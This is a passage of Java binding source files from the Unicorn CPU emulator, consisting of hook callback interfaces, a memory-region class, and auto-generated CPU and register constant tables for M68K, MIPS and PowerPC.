unicorn-2.1.1/bindings/java/src/main/java/unicorn/InvalidInstructionHook.java000066400000000000000000000025271467524106700273550ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN_INVALID} */ public interface InvalidInstructionHook extends Hook { /** Called when an invalid instruction is encountered. * * @param u {@link Unicorn} instance firing this hook * @param user user data provided when registering this hook * @return {@code true} to mark the exception as handled. Emulation * will stop without raising an invalid instruction exception. * If no hooks return {@code true}, emulation will stop with * an invalid instruction exception. */ public boolean hook(Unicorn u, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/M68kConst.java000066400000000000000000000031521467524106700244330ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface M68kConst { // M68K CPU public static final int UC_CPU_M68K_M5206 = 0; public static final int UC_CPU_M68K_M68000 = 1; public static final int UC_CPU_M68K_M68020 = 2; public static final int UC_CPU_M68K_M68030 = 3; public static final int UC_CPU_M68K_M68040 = 4; public static final int UC_CPU_M68K_M68060 = 5; public static final int UC_CPU_M68K_M5208 = 6; public static final int UC_CPU_M68K_CFV4E = 7; public static final int UC_CPU_M68K_ANY = 8; public static final int UC_CPU_M68K_ENDING = 9; // M68K registers public static final int UC_M68K_REG_INVALID = 0; public static final int UC_M68K_REG_A0 = 1; public static final int UC_M68K_REG_A1 = 2; public static final int UC_M68K_REG_A2 = 3; public static final int UC_M68K_REG_A3 = 4; public static final int UC_M68K_REG_A4 = 5; public static final int UC_M68K_REG_A5 = 6; public static final int UC_M68K_REG_A6 = 7; public static final int UC_M68K_REG_A7 = 8; public static final int UC_M68K_REG_D0 = 9; public static final int UC_M68K_REG_D1 = 10; public static final int UC_M68K_REG_D2 = 11; public static final int UC_M68K_REG_D3 = 12; public static final int UC_M68K_REG_D4 = 13; public static final int UC_M68K_REG_D5 = 14; public static final int UC_M68K_REG_D6 = 15; public static final int UC_M68K_REG_D7 = 16; public static final int UC_M68K_REG_SR = 17; public static final int UC_M68K_REG_PC = 18; public static final int UC_M68K_REG_ENDING = 19; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MemHook.java000066400000000000000000000032171467524106700242400ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_MEM_VALID} * (UC_HOOK_MEM_{READ,WRITE,FETCH} and/or * {@code UC_HOOK_MEM_READ_AFTER}) */ public interface MemHook extends Hook { /** Called when a valid memory access occurs within the registered range. * * @param u {@link Unicorn} instance firing this hook * @param type type of the memory access: one of {@code UC_MEM_READ}, * {@code UC_MEM_WRITE} or {@code UC_MEM_READ_AFTER}. * @param address address of the memory access * @param size size of the memory access * @param value value read ({@code UC_MEM_READ_AFTER} only) or written * ({@code UC_MEM_WRITE} only). Not meaningful for * {@code UC_MEM_READ} events. * @param user user data provided when registering this hook */ public void hook(Unicorn u, int type, long address, int size, long value, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MemRegion.java000066400000000000000000000021401467524106700245550ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; public class MemRegion { public long begin; public long end; public int perms; public MemRegion(long begin, long end, int perms) { this.begin = begin; this.end = end; this.perms = perms; } @Override public String toString() { return String.format("MemRegion [begin=0x%x, end=0x%x, perms=%d]", begin, end, perms); } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MipsConst.java000066400000000000000000000256001467524106700246200ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface MipsConst { // MIPS32 CPUS public static final int UC_CPU_MIPS32_4KC = 0; public static final int UC_CPU_MIPS32_4KM = 1; public static final int UC_CPU_MIPS32_4KECR1 = 2; public static final int UC_CPU_MIPS32_4KEMR1 = 3; public static final int UC_CPU_MIPS32_4KEC = 4; public static final int UC_CPU_MIPS32_4KEM = 5; public static final int UC_CPU_MIPS32_24KC = 6; public static final int UC_CPU_MIPS32_24KEC = 7; public static final int UC_CPU_MIPS32_24KF = 8; public static final int UC_CPU_MIPS32_34KF = 9; public static final int UC_CPU_MIPS32_74KF = 10; public static final int UC_CPU_MIPS32_M14K = 11; public static final int UC_CPU_MIPS32_M14KC = 12; public static final int UC_CPU_MIPS32_P5600 = 13; public static final int UC_CPU_MIPS32_MIPS32R6_GENERIC = 14; public static final int UC_CPU_MIPS32_I7200 = 15; public static final int UC_CPU_MIPS32_ENDING = 16; // MIPS64 CPUS public static final int UC_CPU_MIPS64_R4000 = 0; public static final int UC_CPU_MIPS64_VR5432 = 1; public static final int UC_CPU_MIPS64_5KC = 2; public static final int UC_CPU_MIPS64_5KF = 3; public static final int UC_CPU_MIPS64_20KC = 4; public static final int UC_CPU_MIPS64_MIPS64R2_GENERIC = 5; public static final int UC_CPU_MIPS64_5KEC = 6; public static final int UC_CPU_MIPS64_5KEF = 7; public static final int UC_CPU_MIPS64_I6400 = 8; public static final int UC_CPU_MIPS64_I6500 = 9; public static final int UC_CPU_MIPS64_LOONGSON_2E = 10; public static final int UC_CPU_MIPS64_LOONGSON_2F = 11; public static final int UC_CPU_MIPS64_MIPS64DSPR2 = 12; public static final int UC_CPU_MIPS64_ENDING = 13; // MIPS registers public static final int UC_MIPS_REG_INVALID = 0; // General purpose registers public static final int UC_MIPS_REG_PC = 1; public static final int UC_MIPS_REG_0 = 2; public static final int UC_MIPS_REG_1 = 3; public static final int UC_MIPS_REG_2 = 4; public static final int UC_MIPS_REG_3 = 5; public static final int UC_MIPS_REG_4 = 6; public static final int UC_MIPS_REG_5 = 7; public static final int UC_MIPS_REG_6 = 8; public static final int UC_MIPS_REG_7 = 9; public static final int UC_MIPS_REG_8 = 10; public static final int UC_MIPS_REG_9 = 11; public static final int UC_MIPS_REG_10 = 12; public static final int UC_MIPS_REG_11 = 13; public static final int UC_MIPS_REG_12 = 14; public static final int UC_MIPS_REG_13 = 15; public static final int UC_MIPS_REG_14 = 16; public static final int UC_MIPS_REG_15 = 17; public static final int UC_MIPS_REG_16 = 18; public static final int UC_MIPS_REG_17 = 19; public static final int UC_MIPS_REG_18 = 20; public static final int UC_MIPS_REG_19 = 21; public static final int UC_MIPS_REG_20 = 22; public static final int UC_MIPS_REG_21 = 23; public static final int UC_MIPS_REG_22 = 24; public static final int UC_MIPS_REG_23 = 25; public static final int UC_MIPS_REG_24 = 26; public static final int UC_MIPS_REG_25 = 27; public static final int UC_MIPS_REG_26 = 28; public static final int UC_MIPS_REG_27 = 29; public static final int UC_MIPS_REG_28 = 30; public static final int UC_MIPS_REG_29 = 31; public static final int UC_MIPS_REG_30 = 32; public static final int UC_MIPS_REG_31 = 33; // DSP registers public static final int UC_MIPS_REG_DSPCCOND = 34; public static final int UC_MIPS_REG_DSPCARRY = 35; public static final int UC_MIPS_REG_DSPEFI = 36; public static final int UC_MIPS_REG_DSPOUTFLAG = 37; public static final int UC_MIPS_REG_DSPOUTFLAG16_19 = 38; public static final int UC_MIPS_REG_DSPOUTFLAG20 = 39; public static final int UC_MIPS_REG_DSPOUTFLAG21 = 40; public static final int UC_MIPS_REG_DSPOUTFLAG22 = 41; public static final int UC_MIPS_REG_DSPOUTFLAG23 = 42; public static final int UC_MIPS_REG_DSPPOS = 43; public static final int UC_MIPS_REG_DSPSCOUNT = 44; // ACC registers public static final int UC_MIPS_REG_AC0 = 45; public static final int UC_MIPS_REG_AC1 = 46; public static final int UC_MIPS_REG_AC2 = 47; public static final int UC_MIPS_REG_AC3 = 48; // COP registers public static final int UC_MIPS_REG_CC0 = 49; public static final int UC_MIPS_REG_CC1 = 50; public static final int UC_MIPS_REG_CC2 = 51; public static final int UC_MIPS_REG_CC3 = 52; public static final int UC_MIPS_REG_CC4 = 53; public static final int UC_MIPS_REG_CC5 = 54; public static final int UC_MIPS_REG_CC6 = 55; public static final int UC_MIPS_REG_CC7 = 56; // FPU registers public static final int UC_MIPS_REG_F0 = 57; public static final int UC_MIPS_REG_F1 = 58; public static final int UC_MIPS_REG_F2 = 59; public static final int UC_MIPS_REG_F3 = 60; public static final int UC_MIPS_REG_F4 = 61; public static final int UC_MIPS_REG_F5 = 62; public static final int UC_MIPS_REG_F6 = 63; public static final int UC_MIPS_REG_F7 = 64; public static final int UC_MIPS_REG_F8 = 65; public static final int UC_MIPS_REG_F9 = 66; public static final int UC_MIPS_REG_F10 = 67; public static final int UC_MIPS_REG_F11 = 68; public static final int UC_MIPS_REG_F12 = 69; public static final int UC_MIPS_REG_F13 = 70; public static final int UC_MIPS_REG_F14 = 71; public static final int UC_MIPS_REG_F15 = 72; public static final int UC_MIPS_REG_F16 = 73; public static final int UC_MIPS_REG_F17 = 74; public static final int UC_MIPS_REG_F18 = 75; public static final int UC_MIPS_REG_F19 = 76; public static final int UC_MIPS_REG_F20 = 77; public static final int UC_MIPS_REG_F21 = 78; public static final int UC_MIPS_REG_F22 = 79; public static final int UC_MIPS_REG_F23 = 80; public static final int UC_MIPS_REG_F24 = 81; public static final int UC_MIPS_REG_F25 = 82; public static final int UC_MIPS_REG_F26 = 83; public static final int UC_MIPS_REG_F27 = 84; public static final int UC_MIPS_REG_F28 = 85; public static final int UC_MIPS_REG_F29 = 86; public static final int UC_MIPS_REG_F30 = 87; public static final int UC_MIPS_REG_F31 = 88; public static final int UC_MIPS_REG_FCC0 = 89; public static final int UC_MIPS_REG_FCC1 = 90; public static final int UC_MIPS_REG_FCC2 = 91; public static final int UC_MIPS_REG_FCC3 = 92; public static final int UC_MIPS_REG_FCC4 = 93; public static final int UC_MIPS_REG_FCC5 = 94; public static final int UC_MIPS_REG_FCC6 = 95; public static final int UC_MIPS_REG_FCC7 = 96; // AFPR128 public static final int UC_MIPS_REG_W0 = 97; public static final int UC_MIPS_REG_W1 = 98; public static final int UC_MIPS_REG_W2 = 99; public static final int UC_MIPS_REG_W3 = 100; public static final int UC_MIPS_REG_W4 = 101; public static final int UC_MIPS_REG_W5 = 102; public static final int UC_MIPS_REG_W6 = 103; public static final int UC_MIPS_REG_W7 = 104; public static final int UC_MIPS_REG_W8 = 105; public static final int UC_MIPS_REG_W9 = 106; public static final int UC_MIPS_REG_W10 = 107; public static final int UC_MIPS_REG_W11 = 108; public static final int UC_MIPS_REG_W12 = 109; public static final int UC_MIPS_REG_W13 = 110; public static final int UC_MIPS_REG_W14 = 111; public static final int UC_MIPS_REG_W15 = 112; public static final int UC_MIPS_REG_W16 = 113; public static final int UC_MIPS_REG_W17 = 114; public static final int UC_MIPS_REG_W18 = 115; public static final int UC_MIPS_REG_W19 = 116; public static final int UC_MIPS_REG_W20 = 117; public static final int UC_MIPS_REG_W21 = 118; public static final int UC_MIPS_REG_W22 = 119; public static final int UC_MIPS_REG_W23 = 120; public static final int UC_MIPS_REG_W24 = 121; public static final int UC_MIPS_REG_W25 = 122; public static final int UC_MIPS_REG_W26 = 123; public static final int UC_MIPS_REG_W27 = 124; public static final int UC_MIPS_REG_W28 = 125; public static final int UC_MIPS_REG_W29 = 126; public static final int UC_MIPS_REG_W30 = 127; public static final int UC_MIPS_REG_W31 = 128; public static final int UC_MIPS_REG_HI = 129; public static final int UC_MIPS_REG_LO = 130; public static final int UC_MIPS_REG_P0 = 131; public static final int UC_MIPS_REG_P1 = 132; public static final int UC_MIPS_REG_P2 = 133; public static final int UC_MIPS_REG_MPL0 = 134; public static final int UC_MIPS_REG_MPL1 = 135; public static final int UC_MIPS_REG_MPL2 = 136; public static final int UC_MIPS_REG_CP0_CONFIG3 = 137; public static final int UC_MIPS_REG_CP0_USERLOCAL = 138; public static final int UC_MIPS_REG_CP0_STATUS = 139; public static final int UC_MIPS_REG_ENDING = 140; public static final int UC_MIPS_REG_ZERO = 2; public static final int UC_MIPS_REG_AT = 3; public static final int UC_MIPS_REG_V0 = 4; public static final int UC_MIPS_REG_V1 = 5; public static final int UC_MIPS_REG_A0 = 6; public static final int UC_MIPS_REG_A1 = 7; public static final int UC_MIPS_REG_A2 = 8; public static final int UC_MIPS_REG_A3 = 9; public static final int UC_MIPS_REG_T0 = 10; public static final int UC_MIPS_REG_T1 = 11; public static final int UC_MIPS_REG_T2 = 12; public static final int UC_MIPS_REG_T3 = 13; public static final int UC_MIPS_REG_T4 = 14; public static final int UC_MIPS_REG_T5 = 15; public static final int UC_MIPS_REG_T6 = 16; public static final int UC_MIPS_REG_T7 = 17; public static final int UC_MIPS_REG_S0 = 18; public static final int UC_MIPS_REG_S1 = 19; public static final int UC_MIPS_REG_S2 = 20; public static final int UC_MIPS_REG_S3 = 21; public static final int UC_MIPS_REG_S4 = 22; public static final int UC_MIPS_REG_S5 = 23; public static final int UC_MIPS_REG_S6 = 24; public static final int UC_MIPS_REG_S7 = 25; public static final int UC_MIPS_REG_T8 = 26; public static final int UC_MIPS_REG_T9 = 27; public static final int UC_MIPS_REG_K0 = 28; public static final int UC_MIPS_REG_K1 = 29; public static final int UC_MIPS_REG_GP = 30; public static final int UC_MIPS_REG_SP = 31; public static final int UC_MIPS_REG_FP = 32; public static final int UC_MIPS_REG_S8 = 32; public static final int UC_MIPS_REG_RA = 33; public static final int UC_MIPS_REG_HI0 = 45; public static final int UC_MIPS_REG_HI1 = 46; public static final int UC_MIPS_REG_HI2 = 47; public static final int UC_MIPS_REG_HI3 = 48; public static final int UC_MIPS_REG_LO0 = 45; public static final int UC_MIPS_REG_LO1 = 46; public static final int UC_MIPS_REG_LO2 = 47; public static final int UC_MIPS_REG_LO3 = 48; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MmioReadHandler.java000066400000000000000000000025231467524106700256730ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Interface for handling reads from memory-mapped I/O, mapped via * {@link Unicorn#mmio_map} */ public interface MmioReadHandler { /** Called when a memory read is made to an address in the mapped range. * * @param u {@link Unicorn} instance firing this hook * @param offset offset of the request address from the start of the * mapped range * @param size size of the memory access, in bytes * @param user user data provided when registering this hook * @return value of this I/O request */ long read(Unicorn u, long offset, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/MmioWriteHandler.java000066400000000000000000000025401467524106700261110ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Interface for handling writes to memory-mapped I/O, mapped via * {@link Unicorn#mmio_map} */ public interface MmioWriteHandler { /** Called when a memory write is made to an address in the mapped range. * * @param u {@link Unicorn} instance firing this hook * @param offset offset of the request address from the start of the * mapped range * @param size size of the memory access, in bytes * @param value value being written * @param user user data provided when registering this hook */ void write(Unicorn u, long offset, int size, long value, Object user_data); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/OutHook.java000066400000000000000000000023041467524106700242650ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_OUT} */ public interface OutHook extends InstructionHook { /** Called to handle an x86 OUT instruction. * * @param u {@link Unicorn} instance firing this hook * @param port I/O port number * @param size size of the request (1, 2, or 4 bytes) * @param user user data provided when registering this hook */ public void hook(Unicorn u, int port, int size, int value, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/PpcConst.java000066400000000000000000000526141467524106700244370ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface PpcConst { // PPC CPU public static final int UC_CPU_PPC32_401 = 0; public static final int UC_CPU_PPC32_401A1 = 1; public static final int UC_CPU_PPC32_401B2 = 2; public static final int UC_CPU_PPC32_401C2 = 3; public static final int UC_CPU_PPC32_401D2 = 4; public static final int UC_CPU_PPC32_401E2 = 5; public static final int UC_CPU_PPC32_401F2 = 6; public static final int UC_CPU_PPC32_401G2 = 7; public static final int UC_CPU_PPC32_IOP480 = 8; public static final int UC_CPU_PPC32_COBRA = 9; public static final int UC_CPU_PPC32_403GA = 10; public static final int UC_CPU_PPC32_403GB = 11; public static final int UC_CPU_PPC32_403GC = 12; public static final int UC_CPU_PPC32_403GCX = 13; public static final int UC_CPU_PPC32_405D2 = 14; public static final int UC_CPU_PPC32_405D4 = 15; public static final int UC_CPU_PPC32_405CRA = 16; public static final int UC_CPU_PPC32_405CRB = 17; public static final int UC_CPU_PPC32_405CRC = 18; public static final int UC_CPU_PPC32_405EP = 19; public static final int UC_CPU_PPC32_405EZ = 20; public static final int UC_CPU_PPC32_405GPA = 21; public static final int UC_CPU_PPC32_405GPB = 22; public static final int UC_CPU_PPC32_405GPC = 23; public static final int UC_CPU_PPC32_405GPD = 24; public static final int UC_CPU_PPC32_405GPR = 25; public static final int UC_CPU_PPC32_405LP = 26; public static final int UC_CPU_PPC32_NPE405H = 27; public static final int UC_CPU_PPC32_NPE405H2 = 28; public static final int UC_CPU_PPC32_NPE405L = 29; public static final int UC_CPU_PPC32_NPE4GS3 = 30; public static final int UC_CPU_PPC32_STB03 = 31; public static final int UC_CPU_PPC32_STB04 = 32; public static final int UC_CPU_PPC32_STB25 = 33; public static final int UC_CPU_PPC32_X2VP4 = 34; public static final int UC_CPU_PPC32_X2VP20 = 35; public static final int UC_CPU_PPC32_440_XILINX = 36; public static final int UC_CPU_PPC32_440_XILINX_W_DFPU = 37; public static final int UC_CPU_PPC32_440EPA = 38; public static final int UC_CPU_PPC32_440EPB = 39; public static final int UC_CPU_PPC32_440EPX = 40; public static final int UC_CPU_PPC32_460EXB = 41; public static final int UC_CPU_PPC32_G2 = 42; public static final int UC_CPU_PPC32_G2H4 = 43; public static final int UC_CPU_PPC32_G2GP = 44; public static final int UC_CPU_PPC32_G2LS = 45; public static final int UC_CPU_PPC32_G2HIP3 = 46; public static final int UC_CPU_PPC32_G2HIP4 = 47; public static final int UC_CPU_PPC32_MPC603 = 48; public static final int UC_CPU_PPC32_G2LE = 49; public static final int UC_CPU_PPC32_G2LEGP = 50; public static final int UC_CPU_PPC32_G2LELS = 51; public static final int UC_CPU_PPC32_G2LEGP1 = 52; public static final int UC_CPU_PPC32_G2LEGP3 = 53; public static final int UC_CPU_PPC32_MPC5200_V10 = 54; public static final int UC_CPU_PPC32_MPC5200_V11 = 55; public static final int UC_CPU_PPC32_MPC5200_V12 = 56; public static final int UC_CPU_PPC32_MPC5200B_V20 = 57; public static final int UC_CPU_PPC32_MPC5200B_V21 = 58; public static final int UC_CPU_PPC32_E200Z5 = 59; public static final int UC_CPU_PPC32_E200Z6 = 60; public static final int UC_CPU_PPC32_E300C1 = 61; public static final int UC_CPU_PPC32_E300C2 = 62; public static final int UC_CPU_PPC32_E300C3 = 63; public static final int UC_CPU_PPC32_E300C4 = 64; public static final int UC_CPU_PPC32_MPC8343 = 65; public static final int UC_CPU_PPC32_MPC8343A = 66; public static final int UC_CPU_PPC32_MPC8343E = 67; public static final int UC_CPU_PPC32_MPC8343EA = 68; public static final int UC_CPU_PPC32_MPC8347T = 69; public static final int UC_CPU_PPC32_MPC8347P = 70; public static final int UC_CPU_PPC32_MPC8347AT = 71; public static final int UC_CPU_PPC32_MPC8347AP = 72; public static final int UC_CPU_PPC32_MPC8347ET = 73; public static final int UC_CPU_PPC32_MPC8347EP = 74; public static final int UC_CPU_PPC32_MPC8347EAT = 75; public static final int UC_CPU_PPC32_MPC8347EAP = 76; public static final int UC_CPU_PPC32_MPC8349 = 77; public static final int UC_CPU_PPC32_MPC8349A = 78; public static final int UC_CPU_PPC32_MPC8349E = 79; public static final int UC_CPU_PPC32_MPC8349EA = 80; public static final int UC_CPU_PPC32_MPC8377 = 81; public static final int UC_CPU_PPC32_MPC8377E = 82; public static final int UC_CPU_PPC32_MPC8378 = 83; public static final int UC_CPU_PPC32_MPC8378E = 84; public static final int UC_CPU_PPC32_MPC8379 = 85; public static final int UC_CPU_PPC32_MPC8379E = 86; public static final int UC_CPU_PPC32_E500_V10 = 87; public static final int UC_CPU_PPC32_E500_V20 = 88; public static final int UC_CPU_PPC32_E500V2_V10 = 89; public static final int UC_CPU_PPC32_E500V2_V20 = 90; public static final int UC_CPU_PPC32_E500V2_V21 = 91; public static final int UC_CPU_PPC32_E500V2_V22 = 92; public static final int UC_CPU_PPC32_E500V2_V30 = 93; public static final int UC_CPU_PPC32_E500MC = 94; public static final int UC_CPU_PPC32_MPC8533_V10 = 95; public static final int UC_CPU_PPC32_MPC8533_V11 = 96; public static final int UC_CPU_PPC32_MPC8533E_V10 = 97; public static final int UC_CPU_PPC32_MPC8533E_V11 = 98; public static final int UC_CPU_PPC32_MPC8540_V10 = 99; public static final int UC_CPU_PPC32_MPC8540_V20 = 100; public static final int UC_CPU_PPC32_MPC8540_V21 = 101; public static final int UC_CPU_PPC32_MPC8541_V10 = 102; public static final int UC_CPU_PPC32_MPC8541_V11 = 103; public static final int UC_CPU_PPC32_MPC8541E_V10 = 104; public static final int UC_CPU_PPC32_MPC8541E_V11 = 105; public static final int UC_CPU_PPC32_MPC8543_V10 = 106; public static final int UC_CPU_PPC32_MPC8543_V11 = 107; public static final int UC_CPU_PPC32_MPC8543_V20 = 108; public static final int UC_CPU_PPC32_MPC8543_V21 = 109; public static final int UC_CPU_PPC32_MPC8543E_V10 = 110; public static final int UC_CPU_PPC32_MPC8543E_V11 = 111; public static final int UC_CPU_PPC32_MPC8543E_V20 = 112; public static final int UC_CPU_PPC32_MPC8543E_V21 = 113; public static final int UC_CPU_PPC32_MPC8544_V10 = 114; public static final int UC_CPU_PPC32_MPC8544_V11 = 115; public static final int UC_CPU_PPC32_MPC8544E_V10 = 116; public static final int UC_CPU_PPC32_MPC8544E_V11 = 117; public static final int UC_CPU_PPC32_MPC8545_V20 = 118; public static final int UC_CPU_PPC32_MPC8545_V21 = 119; public static final int UC_CPU_PPC32_MPC8545E_V20 = 120; public static final int UC_CPU_PPC32_MPC8545E_V21 = 121; public static final int UC_CPU_PPC32_MPC8547E_V20 = 122; public static final int UC_CPU_PPC32_MPC8547E_V21 = 123; public static final int UC_CPU_PPC32_MPC8548_V10 = 124; public static final int UC_CPU_PPC32_MPC8548_V11 = 125; public static final int UC_CPU_PPC32_MPC8548_V20 = 126; public static final int UC_CPU_PPC32_MPC8548_V21 = 127; public static final int UC_CPU_PPC32_MPC8548E_V10 = 128; public static final int UC_CPU_PPC32_MPC8548E_V11 = 129; public static final int UC_CPU_PPC32_MPC8548E_V20 = 130; public static final int UC_CPU_PPC32_MPC8548E_V21 = 131; public static final int UC_CPU_PPC32_MPC8555_V10 = 132; public static final int UC_CPU_PPC32_MPC8555_V11 = 133; public static final int UC_CPU_PPC32_MPC8555E_V10 = 134; public static final int UC_CPU_PPC32_MPC8555E_V11 = 135; public static final int UC_CPU_PPC32_MPC8560_V10 = 136; public static final int UC_CPU_PPC32_MPC8560_V20 = 137; public static final int UC_CPU_PPC32_MPC8560_V21 = 138; public static final int UC_CPU_PPC32_MPC8567 = 139; public static final int UC_CPU_PPC32_MPC8567E = 140; public static final int UC_CPU_PPC32_MPC8568 = 141; public static final int UC_CPU_PPC32_MPC8568E = 142; public static final int UC_CPU_PPC32_MPC8572 = 143; public static final int UC_CPU_PPC32_MPC8572E = 144; public static final int UC_CPU_PPC32_E600 = 145; public static final int UC_CPU_PPC32_MPC8610 = 146; public static final int UC_CPU_PPC32_MPC8641 = 147; public static final int UC_CPU_PPC32_MPC8641D = 148; public static final int UC_CPU_PPC32_601_V0 = 149; public static final int UC_CPU_PPC32_601_V1 = 150; public static final int UC_CPU_PPC32_601_V2 = 151; public static final int UC_CPU_PPC32_602 = 152; public static final int UC_CPU_PPC32_603 = 153; public static final int UC_CPU_PPC32_603E_V1_1 = 154; public static final int UC_CPU_PPC32_603E_V1_2 = 155; public static final int UC_CPU_PPC32_603E_V1_3 = 156; public static final int UC_CPU_PPC32_603E_V1_4 = 157; public static final int UC_CPU_PPC32_603E_V2_2 = 158; public static final int UC_CPU_PPC32_603E_V3 = 159; public static final int UC_CPU_PPC32_603E_V4 = 160; public static final int UC_CPU_PPC32_603E_V4_1 = 161; public static final int UC_CPU_PPC32_603E7 = 162; public static final int UC_CPU_PPC32_603E7T = 163; public static final int UC_CPU_PPC32_603E7V = 164; public static final int UC_CPU_PPC32_603E7V1 = 165; public static final int UC_CPU_PPC32_603E7V2 = 166; public static final int UC_CPU_PPC32_603P = 167; public static final int UC_CPU_PPC32_604 = 168; public static final int UC_CPU_PPC32_604E_V1_0 = 169; public static final int UC_CPU_PPC32_604E_V2_2 = 170; public static final int UC_CPU_PPC32_604E_V2_4 = 171; public static final int UC_CPU_PPC32_604R = 172; public static final int UC_CPU_PPC32_740_V1_0 = 173; public static final int UC_CPU_PPC32_750_V1_0 = 174; public static final int UC_CPU_PPC32_740_V2_0 = 175; public static final int UC_CPU_PPC32_750_V2_0 = 176; public static final int UC_CPU_PPC32_740_V2_1 = 177; public static final int UC_CPU_PPC32_750_V2_1 = 178; public static final int UC_CPU_PPC32_740_V2_2 = 179; public static final int UC_CPU_PPC32_750_V2_2 = 180; public static final int UC_CPU_PPC32_740_V3_0 = 181; public static final int UC_CPU_PPC32_750_V3_0 = 182; public static final int UC_CPU_PPC32_740_V3_1 = 183; public static final int UC_CPU_PPC32_750_V3_1 = 184; public static final int UC_CPU_PPC32_740E = 185; public static final int UC_CPU_PPC32_750E = 186; public static final int UC_CPU_PPC32_740P = 187; public static final int UC_CPU_PPC32_750P = 188; public static final int UC_CPU_PPC32_750CL_V1_0 = 189; public static final int UC_CPU_PPC32_750CL_V2_0 = 190; public static final int UC_CPU_PPC32_750CX_V1_0 = 191; public static final int UC_CPU_PPC32_750CX_V2_0 = 192; public static final int UC_CPU_PPC32_750CX_V2_1 = 193; public static final int UC_CPU_PPC32_750CX_V2_2 = 194; public static final int UC_CPU_PPC32_750CXE_V2_1 = 195; public static final int UC_CPU_PPC32_750CXE_V2_2 = 196; public static final int UC_CPU_PPC32_750CXE_V2_3 = 197; public static final int UC_CPU_PPC32_750CXE_V2_4 = 198; public static final int UC_CPU_PPC32_750CXE_V2_4B = 199; public static final int UC_CPU_PPC32_750CXE_V3_0 = 200; public static final int UC_CPU_PPC32_750CXE_V3_1 = 201; public static final int UC_CPU_PPC32_750CXE_V3_1B = 202; public static final int UC_CPU_PPC32_750CXR = 203; public static final int UC_CPU_PPC32_750FL = 204; public static final int UC_CPU_PPC32_750FX_V1_0 = 205; public static final int UC_CPU_PPC32_750FX_V2_0 = 206; public static final int UC_CPU_PPC32_750FX_V2_1 = 207; public static final int UC_CPU_PPC32_750FX_V2_2 = 208; public static final int UC_CPU_PPC32_750FX_V2_3 = 209; public static final int UC_CPU_PPC32_750GL = 210; public static final int UC_CPU_PPC32_750GX_V1_0 = 211; public static final int UC_CPU_PPC32_750GX_V1_1 = 212; public static final int UC_CPU_PPC32_750GX_V1_2 = 213; public static final int UC_CPU_PPC32_750L_V2_0 = 214; public static final int UC_CPU_PPC32_750L_V2_1 = 215; public static final int UC_CPU_PPC32_750L_V2_2 = 216; public static final int UC_CPU_PPC32_750L_V3_0 = 217; public static final int UC_CPU_PPC32_750L_V3_2 = 218; public static final int 